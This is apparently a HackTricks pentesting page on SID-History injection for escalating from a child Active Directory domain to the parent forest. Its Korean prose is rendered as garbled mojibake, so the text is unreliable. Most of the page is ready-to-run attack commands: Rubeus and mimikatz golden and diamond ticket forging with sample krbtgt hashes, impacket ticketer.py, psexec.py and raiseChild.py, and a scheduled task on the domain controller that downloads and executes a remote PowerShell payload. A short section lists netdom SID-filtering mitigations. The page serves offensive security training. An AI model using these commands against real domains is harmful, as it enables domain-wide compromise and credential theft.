SID-History Injection

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

SID History Injection Attack

SID History Injection Attack์˜ ์ดˆ์ ์€ ๋„๋ฉ”์ธ ๊ฐ„ ์‚ฌ์šฉ์ž ๋งˆ์ด๊ทธ๋ ˆ์ด์…˜์„ ์ง€์›ํ•˜๋ฉด์„œ ์ด์ „ ๋„๋ฉ”์ธ์˜ ๋ฆฌ์†Œ์Šค์— ๋Œ€ํ•œ ์ง€์†์ ์ธ ์ ‘๊ทผ์„ ๋ณด์žฅํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Š” ์‚ฌ์šฉ์ž์˜ ์ด์ „ ๋ณด์•ˆ ์‹๋ณ„์ž(SID)๋ฅผ ์ƒˆ๋กœ์šด ๊ณ„์ •์˜ SID History์— ํ†ตํ•ฉํ•จ์œผ๋กœ์จ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค. ํŠนํžˆ, ์ด ๊ณผ์ •์€ ์ƒ์œ„ ๋„๋ฉ”์ธ์—์„œ ๊ณ ๊ธ‰ ๊ถŒํ•œ ๊ทธ๋ฃน(์˜ˆ: Enterprise Admins ๋˜๋Š” Domain Admins)์˜ SID๋ฅผ SID History์— ์ถ”๊ฐ€ํ•˜์—ฌ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ๋ถ€์—ฌํ•˜๋„๋ก ์กฐ์ž‘๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์•…์šฉ์€ ์ƒ์œ„ ๋„๋ฉ”์ธ ๋‚ด์˜ ๋ชจ๋“  ๋ฆฌ์†Œ์Šค์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ๋ถ€์—ฌํ•ฉ๋‹ˆ๋‹ค.

์ด ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•˜๋Š” ๋ฐฉ๋ฒ•์€ Golden Ticket ๋˜๋Š” Diamond Ticket์˜ ์ƒ์„ฑ ๋‘ ๊ฐ€์ง€๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

โ€œEnterprise Adminsโ€ ๊ทธ๋ฃน์˜ SID๋ฅผ ์ฐพ์œผ๋ ค๋ฉด ๋จผ์ € ๋ฃจํŠธ ๋„๋ฉ”์ธ์˜ SID๋ฅผ ์ฐพ์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์‹๋ณ„ ํ›„, Enterprise Admins ๊ทธ๋ฃน SID๋Š” ๋ฃจํŠธ ๋„๋ฉ”์ธ SID์— -519๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋ฃจํŠธ ๋„๋ฉ”์ธ SID๊ฐ€ S-1-5-21-280534878-1496970234-700767426์ธ ๊ฒฝ์šฐ, โ€œEnterprise Adminsโ€ ๊ทธ๋ฃน์˜ ๊ฒฐ๊ณผ SID๋Š” S-1-5-21-280534878-1496970234-700767426-519๊ฐ€ ๋ฉ๋‹ˆ๋‹ค.

Domain Admins ๊ทธ๋ฃน๋„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” 512๋กœ ๋๋‚ฉ๋‹ˆ๋‹ค.

๋‹ค๋ฅธ ๋„๋ฉ”์ธ์˜ ๊ทธ๋ฃน(SID, ์˜ˆ: โ€œDomain Adminsโ€)์„ ์ฐพ๋Š” ๋˜ ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์€:

Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid

Warning

SID ํžˆ์Šคํ† ๋ฆฌ๋ฅผ ์‹ ๋ขฐ ๊ด€๊ณ„์—์„œ ๋น„ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋กœ ์ธํ•ด ์ด ๊ณต๊ฒฉ์ด ์‹คํŒจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ฌธ์„œ์— ๋”ฐ๋ฅด๋ฉด:

  • netdom ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํฌ๋ฆฌ์ŠคํŠธ ์‹ ๋ขฐ์—์„œ SIDHistory ๋น„ํ™œ์„ฑํ™” (netdom trust /domain: /EnableSIDHistory:no on the domain controller)
  • netdom ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์™ธ๋ถ€ ์‹ ๋ขฐ์— SID ํ•„ํ„ฐ ๊ฒฉ๋ฆฌ ์ ์šฉ (netdom trust /domain: /quarantine:yes on the domain controller)
  • ๋‹จ์ผ ํฌ๋ฆฌ์ŠคํŠธ ๋‚ด ๋„๋ฉ”์ธ ์‹ ๋ขฐ์— SID ํ•„ํ„ฐ๋ง ์ ์šฉ์€ ์ง€์›๋˜์ง€ ์•Š๋Š” ๊ตฌ์„ฑ์œผ๋กœ ์ธํ•ด ๊ถŒ์žฅ๋˜์ง€ ์•Š์œผ๋ฉฐ, ํŒŒ๊ดด์ ์ธ ๋ณ€๊ฒฝ์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํฌ๋ฆฌ์ŠคํŠธ ๋‚ด ๋„๋ฉ”์ธ์ด ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ๊ฒฝ์šฐ, ํ•ด๋‹น ๋„๋ฉ”์ธ์€ ํฌ๋ฆฌ์ŠคํŠธ์˜ ๊ตฌ์„ฑ์›์ด ๋˜์–ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค. ์ด ๊ฒฝ์šฐ, ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋„๋ฉ”์ธ๊ณผ ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ๋„๋ฉ”์ธ์„ ๋ณ„๋„์˜ ํฌ๋ฆฌ์ŠคํŠธ๋กœ ๋ถ„๋ฆฌํ•˜์—ฌ SID ํ•„ํ„ฐ๋ง์„ ์ ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ์ƒํ˜ธ ํฌ๋ฆฌ์ŠคํŠธ ์‹ ๋ขฐ๋ฅผ ์„ค์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์ด ์šฐํšŒ์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ์ด ๊ฒŒ์‹œ๋ฌผ์„ ํ™•์ธํ•˜์„ธ์š”: https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4

๋‹ค์ด์•„๋ชฌ๋“œ ํ‹ฐ์ผ“ (Rubeus + KRBTGT-AES256)

๋งˆ์ง€๋ง‰์œผ๋กœ ์ด ์‹œ๋„๋ฅผ ํ–ˆ์„ ๋•Œ, /ldap ์ธ์ˆ˜๋ฅผ ์ถ”๊ฐ€ํ•ด์•ผ ํ–ˆ์Šต๋‹ˆ๋‹ค.

# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap /ldap

# Or a ptt with a golden ticket
## The /ldap command will get the details from the LDAP (so you don't need to put the SID)
## The /printcmd option will print the complete command if later you want to generate a token offline
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid>  /sids:<parent_domain_sid>-519 /user:Administrator /ptt /ldap /nowrap /printcmd

#e.g.

execute-assembly ../SharpCollection/Rubeus.exe golden /user:Administrator /domain:current.domain.local /sid:S-1-21-19375142345-528315377-138571287 /rc4:12861032628c1c32c012836520fc7123 /sids:S-1-5-21-2318540928-39816350-2043127614-519 /ptt /ldap /nowrap /printcmd

# You can use "Administrator" as username or any other string

Golden Ticket (Mimikatz) with KRBTGT-AES256

mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain

๊ณจ๋“  ํ‹ฐ์ผ“์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”:

Golden Ticket

๋‹ค์ด์•„๋ชฌ๋“œ ํ‹ฐ์ผ“์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”:

Diamond Ticket

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

์†์ƒ๋œ ๋„๋ฉ”์ธ์˜ KRBTGT ํ•ด์‹œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฃจํŠธ ๋˜๋Š” ์—”ํ„ฐํ”„๋ผ์ด์ฆˆ ๊ด€๋ฆฌ์ž์˜ DA๋กœ ์ƒ์Šน:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local

schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"

schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"

ํš๋“ํ•œ ๊ถŒํ•œ์œผ๋กœ ์ƒˆ๋กœ์šด ๋„๋ฉ”์ธ์—์„œ ์˜ˆ๋ฅผ ๋“ค์–ด DCSync ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

DCSync

๋ฆฌ๋ˆ…์Šค์—์„œ

ticketer.py ์ˆ˜๋™ ์‚ฌ์šฉ

# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"

# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator

# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS

# Load ticket
export KRB5CCNAME=hacker.ccache

# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10

Automatic using raiseChild.py

์ด๊ฒƒ์€ ์ž์‹ ๋„๋ฉ”์ธ์—์„œ ๋ถ€๋ชจ ๋„๋ฉ”์ธ์œผ๋กœ์˜ ์ƒ์Šน์„ ์ž๋™ํ™”ํ•˜๋Š” Impacket ์Šคํฌ๋ฆฝํŠธ์ž…๋‹ˆ๋‹ค. ์Šคํฌ๋ฆฝํŠธ๋Š” ๋‹ค์Œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  • ๋Œ€์ƒ ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ
  • ์ž์‹ ๋„๋ฉ”์ธ์˜ ๊ด€๋ฆฌ์ž ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ์ž๊ฒฉ ์ฆ๋ช…

ํ๋ฆ„์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  • ๋ถ€๋ชจ ๋„๋ฉ”์ธ์˜ Enterprise Admins ๊ทธ๋ฃน์— ๋Œ€ํ•œ SID๋ฅผ ์–ป์Šต๋‹ˆ๋‹ค.
  • ์ž์‹ ๋„๋ฉ”์ธ์˜ KRBTGT ๊ณ„์ •์— ๋Œ€ํ•œ ํ•ด์‹œ๋ฅผ ๊ฒ€์ƒ‰ํ•ฉ๋‹ˆ๋‹ค.
  • Golden Ticket์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
  • ๋ถ€๋ชจ ๋„๋ฉ”์ธ์— ๋กœ๊ทธ์ธํ•ฉ๋‹ˆ๋‹ค.
  • ๋ถ€๋ชจ ๋„๋ฉ”์ธ์˜ Administrator ๊ณ„์ •์— ๋Œ€ํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ๊ฒ€์ƒ‰ํ•ฉ๋‹ˆ๋‹ค.
  • target-exec ์Šค์œ„์น˜๊ฐ€ ์ง€์ •๋œ ๊ฒฝ์šฐ, Psexec๋ฅผ ํ†ตํ•ด ๋ถ€๋ชจ ๋„๋ฉ”์ธ์˜ ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ์— ์ธ์ฆํ•ฉ๋‹ˆ๋‹ค.
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ